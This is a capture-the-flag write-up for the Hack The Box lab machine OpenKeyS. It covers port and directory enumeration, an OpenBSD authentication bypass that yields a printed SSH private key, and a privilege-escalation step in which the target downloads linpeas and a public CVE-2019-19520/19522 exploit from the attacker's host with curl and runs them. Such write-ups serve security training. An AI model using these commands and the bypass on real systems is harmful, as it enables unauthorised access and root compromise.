--- search: exclude: true --- # OpenKeyS Writeup ![](img/59.png) ## Introduction : OpenKeyS is an Easy (but marked as Medium) OpenBSD box released back in July 2020. ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → nmap -vvv -p- 10.10.10.199 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered Discovered open port 22/tcp on 10.10.10.199 Discovered open port 80/tcp on 10.10.10.199 [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → nmap -sCV -p22,80 10.10.10.199 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-26 21:12 CEST Nmap scan report for 10.10.10.199 Host is up (0.47s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.1 (protocol 2.0) | ssh-hostkey: | 3072 5e:ff:81:e9:1f:9b:f8:9a:25:df:5d:82:1a:dd:7a:81 (RSA) | 256 64:7a:5a:52:85:c5:6d:d5:4a:6b:a7:1a:9a:8a:b9:bb (ECDSA) |_ 256 12:35:4b:6e:23:09:dc:ea:00:8c:72:20:c7:50:32:f3 (ED25519) 80/tcp open http OpenBSD httpd |_http-title: Site doesn't have a title (text/html). Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . ## **Part 2 : Getting User Access** Our nmap scan picked up port 80 which is a simple login page: ![](prg/59_002.png) Let's enumerate the webservice using gobuster: [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → gobuster dir -q -t 50 -u http://10.10.10.199 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-words.txt -x php,txt /includes (Status: 301) [Size: 443] [--> http://10.10.10.199/includes/] /js (Status: 301) [Size: 443] [--> http://10.10.10.199/js/] /css (Status: 301) [Size: 443] [--> http://10.10.10.199/css/] /images (Status: 301) [Size: 443] [--> http://10.10.10.199/images/] /index.php (Status: 200) [Size: 4837] /fonts (Status: 301) [Size: 443] [--> http://10.10.10.199/fonts/] /. (Status: 200) [Size: 96] We found the /includes directory so let's check it from our web browser: ![](prg/59_001.png) Here we see that we have access to the **auth.php.swp** file: [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → wget http://10.10.10.199/includes/auth.php.swp --2021-06-26 21:20:14-- http://10.10.10.199/includes/auth.php.swp Connecting to 10.10.10.199:80... connected. HTTP request sent, awaiting response... 200 OK Length: unspecified [text/html] Saving to: ‘auth.php.swp’ auth.php.swp [ <=> ] 12.00K 12.8KB/s in 0.9s 2021-06-26 21:20:16 (12.8 KB/s) - ‘auth.php.swp’ saved [12288] [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → file auth.php.swp auth.php.swp: Vim swap file, version 8.1, pid 49850, user jennifer, host openkeys.htb, file /var/www/htdocs/includes/auth.php [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → cat auth.php.swp 3210#! Utp=adniferopenkeys.htb/var/www/htdocs/includes/auth.php @sWB@? mgC v p n m U S 0 J ?>} session_start(); session_destroy(); session_unset();{function close_session()} $_SESSION["username"] = $_REQUEST['username']; $_SESSION["user_agent"] = $_SERVER['HTTP_USER_AGENT']; $_SESSION["remote_addr"] = $_SERVER['REMOTE_ADDR']; $_SESSION["last_activity"] = $_SERVER['REQUEST_TIME']; $_SESSION["login_time"] = $_SERVER['REQUEST_TIME']; $_SESSION["logged_in"] = True;{function init_session()} } return False; { else } } return True; $_SESSION['last_activity'] = $time; // Session is active, update last activity time and return True { else } return False; close_session(); { ($time - $_SESSION['last_activity']) > $session_timeout) if (isset($_SESSION['last_activity']) && $time = $_SERVER['REQUEST_TIME']; // Has the session expired? { if(isset($_SESSION["logged_in"])) // Is the user logged in? session_start(); // Start the session $session_timeout = 300; // Session timeout in seconds{function is_active_session()} return $retcode; system($cmd, $retcode); $cmd = escapeshellcmd("../auth_helpers/check_auth " . $username . " " . $password);{function authenticate($username, $password)<****?php% So once we download the .swp file we know that this was used by the user jennifer on openkeys.htb (we add it to our hosts file) and that there was a link to **../auth_helpers/check_auth** so we download it after adding openkeys.htb to our hosts file: [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → sudo -i [sudo] password for nothing: ┌──(root💀nowhere)-[~] └─# echo '10.10.10.199 openkeys.htb' >> /etc/hosts ┌──(root💀nowhere)-[~] └─# ping -c1 openkeys.htb PING openkeys.htb (10.10.10.199) 56(84) bytes of data. 64 bytes from openkeys.htb (10.10.10.199): icmp_seq=1 ttl=254 time=470 ms --- openkeys.htb ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 469.674/469.674/469.674/0.000 ms ┌──(root💀nowhere)-[~] └─# exit [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → wget http://10.10.10.199/auth_helpers/check_auth --2021-06-26 21:23:30-- http://10.10.10.199/auth_helpers/check_auth Connecting to 10.10.10.199:80... connected. HTTP request sent, awaiting response... 200 OK Length: 12288 (12K) [application/octet-stream] Saving to: ‘check_auth’ check_auth 100%[======================================================================================================================================================>] 12.00K 12.8KB/s in 0.9s 2021-06-26 21:23:32 (12.8 KB/s) - ‘check_auth’ saved [12288/12288] We check what kind of file check_auth is: [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → file check_auth check_auth: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /usr/libexec/ld.so, for OpenBSD, not stripped [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → rabin2 -I check_auth arch x86 baddr 0x0 binsz 10495 bintype elf bits 64 canary false retguard false class ELF64 compiler Linker: LLD 8.0.1 crypto false endian little havecode true intrp /usr/libexec/ld.so laddr 0x0 lang c linenum true lsyms true machine AMD x86-64 architecture maxopsz 16 minopsz 1 nx true os openbsd pcalign 0 pic true relocs true relro partial rpath NONE sanitiz false static false stripped false subsys openbsd va true So here we see a hint towards **/usr/libexec/ld.so** and after a bit of googling we would stumble upon an authentication bypass using **-schallenge** as the password inside the cookie, so intercept the POST request to the index.php login page we found earlier using burpsuite: ![](prg/59_003.png) Obviously if we send it as it is we get an authentication denied error: ![](prg/59_004.png) So let's try the authentication bypass by going through the PHP cookie we mentionned earlier: ![](prg/59_005.png) We follow the redirection: ![](prg/59_006.png) And we get a SSH key! Now let's save it locally and use it to login as jennifer: [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → cat pkey -----BEGIN OPENSSH PRIVATE KEY----- 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 -----END OPENSSH PRIVATE KEY----- [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → chmod 600 pkey [ 10.66.66.2/32 ] [ /dev/pts/3 ] [~/HTB/openkeys] → ssh -i pkey jennifer@openkeys.htb The authenticity of host 'openkeys.htb (10.10.10.199)' can't be established. ECDSA key fingerprint is SHA256:gzhq4BokiWZ1NNWrblA8w3hLOhlhoRy+NFyi2smBZOA. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added 'openkeys.htb,10.10.10.199' (ECDSA) to the list of known hosts. Last login: Wed Jun 24 09:31:16 2020 from 10.10.14.2 OpenBSD 6.6 (GENERIC) #353: Sat Oct 12 10:45:56 MDT 2019 Welcome to OpenBSD: The proactively secure Unix-like operating system. Please use the sendbug(1) utility to report bugs in the system. Before reporting a bug, please try to reproduce it with the latest version of the code. With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a known fix for it exists, include that as well. openkeys$ id uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel) openkeys$ ls user.txt openkeys$ cat user.txt 36XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to login via SSH as the user jennifer and get the user flag. ## **Part 3 : Getting Root Access** Now in order to privesc this box let's first enumerate it using linpeas.sh: [terminal 1] [ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys] → cp /home/nothing/HTB/Admirer/linpeas.sh . [ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... [terminal 2] openkeys$ curl http://10.10.14.11:9090/linpeas.sh > /tmp/peas.sh % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 333k 100 333k 0 0 66009 0 0:00:05 0:00:05 --:--:-- 80533 openkeys$ chmod +x /tmp/peas.sh openkeys$ /tmp/peas.sh ` ![](prg/59_007.png) Let linpeas.sh run a bit and scrolling through the output we stumble upon **xlock**. So that's the hint to lookup for xlock privesc vulnerabilities, and we stumble upon [CVE-2019-19520](https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot). So we upload the privesc script onto the box: [terminal 1] [ 10.10.14.11/23 ] [ /dev/pts/23 ] [~/HTB/openkeys] → wget https://raw.githubusercontent.com/bcoles/local-exploits/master/CVE-2019-19520/openbsd-authroot -O exploit.sh [ 10.10.14.11/23 ] [ /dev/pts/0 ] [~/HTB/openkeys] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... [terminal 2] openkeys$ curl http://10.10.14.11:9090/exploit.sh > exploit.sh % Total % Received % Xferd Average Speed Time Time Time Current Dload Upload Total Spent Left Speed 100 4087 100 4087 0 0 4315 0 --:--:-- --:--:-- --:--:-- 4311 openkeys$ file exploit.sh exploit.sh: Bourne shell script text executable openkeys$ chmod +x exploit.sh openkeys$ ./exploit.sh openbsd-authroot (CVE-2019-19520 / CVE-2019-19522) [*] checking system ... [*] system supports S/Key authentication [*] id: uid=1001(jennifer) gid=1001(jennifer) groups=1001(jennifer), 0(wheel) [*] compiling ... [*] running Xvfb ... [*] testing for CVE-2019-19520 ... _XSERVTransmkdir: ERROR: euid != 0,directory /tmp/.X11-unix will not be created. [+] success! we have auth group permissions WARNING: THIS EXPLOIT WILL DELETE KEYS. YOU HAVE 5 SECONDS TO CANCEL (CTRL+C). [*] trying CVE-2019-19522 (S/Key) ... Your password is: EGG LARD GROW HOG DRAG LAIN otp-md5 99 obsd91335 S/Key Password: EGG LARD GROW HOG DRAG LAIN openkeys# id uid=0(root) gid=0(wheel) groups=0(wheel), 2(kmem), 3(sys), 4(tty), 5(operator), 20(staff), 31(guest) openkeys# cat /root/root.txt f3XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to privesc to the root user and print the root flag. ## **Conclusion** Here we can see the progress graph : ![](img/59_graph.png)